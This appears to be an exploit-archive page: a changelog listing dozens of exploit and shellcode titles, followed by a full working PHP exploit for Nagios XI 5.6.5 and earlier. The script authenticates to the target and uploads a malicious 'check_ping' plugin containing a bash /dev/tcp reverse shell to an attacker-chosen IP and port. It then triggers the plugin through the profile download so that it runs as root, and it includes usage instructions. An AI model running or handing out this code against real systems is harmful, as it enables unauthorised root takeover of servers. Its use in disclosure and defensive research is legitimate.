
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
219 lines
No EOL
7.9 KiB
PHP
219 lines
No EOL
7.9 KiB
PHP
<?php
|
||
|
||
/*
|
||
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root.
|
||
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with perissions to manage plugins.
|
||
|
||
The getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download),
|
||
is executed as root via a passwordless sudo entry; the script executes the ‘check_plugin’ executuable which is owned by the nagios user
|
||
A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server,can modify the ‘check_plugin’ executable
|
||
and insert malicious commands exectuable as root.
|
||
|
||
Author: Jak Gibb (https://github.com/jakgibb/nagiosxi-root-exploit)
|
||
|
||
Date discovered: 28th July 2019
|
||
Reported to Nagios: 29th July 2019
|
||
Confirmed by Nagios: 29th July 2019
|
||
*/
|
||
|
||
$userVal = parseArgs($argv);
|
||
|
||
checkCookie();
|
||
$userVal['loginNSP'] = extractNSP($userVal['loginUrl']);
|
||
authenticate($userVal);
|
||
|
||
$userVal['pluginNSP'] = extractNSP($userVal['pluginUrl']);
|
||
|
||
uploadPayload($userVal);
|
||
triggerPayload($userVal);
|
||
|
||
function extractNSP($url) {
|
||
|
||
$curl = curl_init();
|
||
curl_setopt($curl, CURLOPT_URL, $url);
|
||
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);;
|
||
curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
|
||
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
|
||
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
|
||
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
|
||
|
||
echo "[+] Grabbing NSP from: {$url}\n";
|
||
$response = curl_exec($curl);
|
||
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
|
||
|
||
if ($httpCode == '200') {
|
||
echo "[+] Retrieved page contents from: {$url}\n";
|
||
} else {
|
||
echo "[+] Unable to open page: {$url} to obtain NSP\n";
|
||
exit(1);
|
||
}
|
||
|
||
$DOM = new DOMDocument();
|
||
@$DOM->loadHTML($response);
|
||
$xpath = new DOMXpath($DOM);
|
||
$input = $xpath->query('//input[@name="nsp"]');
|
||
$nsp = $input->item(0)->getAttribute('value');
|
||
|
||
if (isset($nsp)) {
|
||
echo "[+] Extracted NSP - value: {$nsp}\n";
|
||
} else {
|
||
echo "[+] Unable to obtain NSP from {$url}\n";
|
||
exit(1);
|
||
}
|
||
|
||
return $nsp;
|
||
|
||
}
|
||
|
||
function authenticate($userVal) {
|
||
|
||
$postValues = array(
|
||
'username' => $userVal['user'], 'password' => $userVal['pass'],
|
||
'pageopt' => 'login', 'nsp' => $userVal['loginNSP']
|
||
);
|
||
|
||
$curl = curl_init();
|
||
|
||
curl_setopt($curl, CURLOPT_URL, $userVal['loginUrl']);
|
||
curl_setopt($curl, CURLOPT_POST, TRUE);
|
||
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postValues));
|
||
curl_setopt($curl, CURLOPT_REFERER, $userVal['loginUrl']);
|
||
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
|
||
curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
|
||
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
|
||
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
|
||
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
|
||
|
||
echo "[+] Attempting to login...\n";
|
||
curl_exec($curl);
|
||
if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '302') {
|
||
echo "[+] Authentication success\n";
|
||
} else {
|
||
echo "[+] Unable to plguin, check your credentials\n";
|
||
exit(1);
|
||
}
|
||
|
||
echo "[+] Checking we have admin rights...\n";
|
||
curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
|
||
$response = curl_exec($curl);
|
||
|
||
$title = NULL;
|
||
|
||
$dom = new DOMDocument();
|
||
if (@$dom->loadHTML($response)) {
|
||
$dom->getElementsByTagName("title")->length > 0 ? $title = $dom->getElementsByTagName("title")->item(0)->textContent : FALSE;
|
||
}
|
||
|
||
if (strpos($title, 'Manage') !== FALSE) {
|
||
echo "[+] Admin access confirmed\n";
|
||
} else {
|
||
echo "[+] Unable to reach login page, are you admin?\n";
|
||
exit(1);
|
||
}
|
||
|
||
}
|
||
|
||
function uploadPayload($userVal) {
|
||
|
||
$payload = "-----------------------------18467633426500\nContent-Disposition: form-data; name=\"upload\"\n\n1\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"nsp\"\n\n{$userVal['pluginNSP']}\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\nContent-Type: text/plain\n\nbash -i >& /dev/tcp/{$userVal['reverseip']}/{$userVal['reverseport']} 0>&1\n-----------------------------18467633426500--\n";
|
||
|
||
$curl = curl_init();
|
||
curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
|
||
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
|
||
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
|
||
curl_setopt($curl, CURLOPT_POST, 1);
|
||
curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
|
||
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
|
||
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
|
||
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
|
||
|
||
$headers = array();
|
||
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
|
||
$headers[] = 'Accept-Language: en-GB,en;q=0.5';
|
||
$headers[] = 'Referer: ' . $userVal['pluginUrl'];
|
||
$headers[] = 'Content-Type: multipart/form-data; boundary=---------------------------18467633426500';
|
||
$headers[] = 'Connection: keep-alive';
|
||
$headers[] = 'Upgrade-Insecure-Requests: 1';
|
||
|
||
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
|
||
|
||
echo "[+] Uploading payload...\n";
|
||
|
||
$response = curl_exec($curl);
|
||
$dom = new DOMDocument();
|
||
@$dom->loadHTML($response);
|
||
|
||
$upload = FALSE;
|
||
|
||
foreach ($dom->getElementsByTagName('div') as $div) {
|
||
|
||
if ($div->getAttribute('class') === 'message') {
|
||
if (strpos($div->nodeValue, 'New plugin was installed') !== FALSE) {
|
||
$upload = TRUE;
|
||
}
|
||
}
|
||
}
|
||
|
||
if ($upload) {
|
||
echo "[+] Payload uploaded\n";
|
||
} else {
|
||
echo '[+] Unable to upload payload';
|
||
exit(1);
|
||
}
|
||
|
||
}
|
||
|
||
function triggerPayload($userVal) {
|
||
|
||
$curl = curl_init();
|
||
curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']);
|
||
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
|
||
curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
|
||
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
|
||
|
||
$headers = array();
|
||
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
|
||
$headers[] = 'Connection: keep-alive';
|
||
$headers[] = 'Upgrade-Insecure-Requests: 1';
|
||
|
||
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
|
||
|
||
echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n";
|
||
|
||
curl_exec($curl);
|
||
|
||
}
|
||
|
||
function showHelp() {
|
||
echo "Usage: php exploit.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port\n";
|
||
exit(0);
|
||
}
|
||
|
||
function parseArgs($argv) {
|
||
|
||
$userVal = array();
|
||
for ($i = 1; $i < count($argv); $i++) {
|
||
if (preg_match('/^--([^=]+)=(.*)/', $argv[$i], $match)) {
|
||
$userVal[$match[1]] = $match[2];
|
||
}
|
||
}
|
||
|
||
if (!isset($userVal['host']) || !isset($userVal['ssl']) || !isset($userVal['user']) || !isset($userVal['pass']) || !isset($userVal['reverseip']) || !isset($userVal['reverseport'])) {
|
||
showHelp();
|
||
}
|
||
|
||
$userVal['ssl'] == 'true' ? $userVal['proto'] = 'https://' : $userVal['proto'] = 'http://';
|
||
$userVal['loginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/login.php';
|
||
$userVal['pluginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/admin/monitoringplugins.php';
|
||
$userVal['profileGenUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/includes/components/profile/profile.php?cmd=download';
|
||
|
||
return $userVal;
|
||
|
||
}
|
||
|
||
function checkCookie() {
|
||
if (file_exists('cookie.txt')) {
|
||
echo "cookie.txt already exists - delete prior to running";
|
||
exit(1);
|
||
}
|
||
} |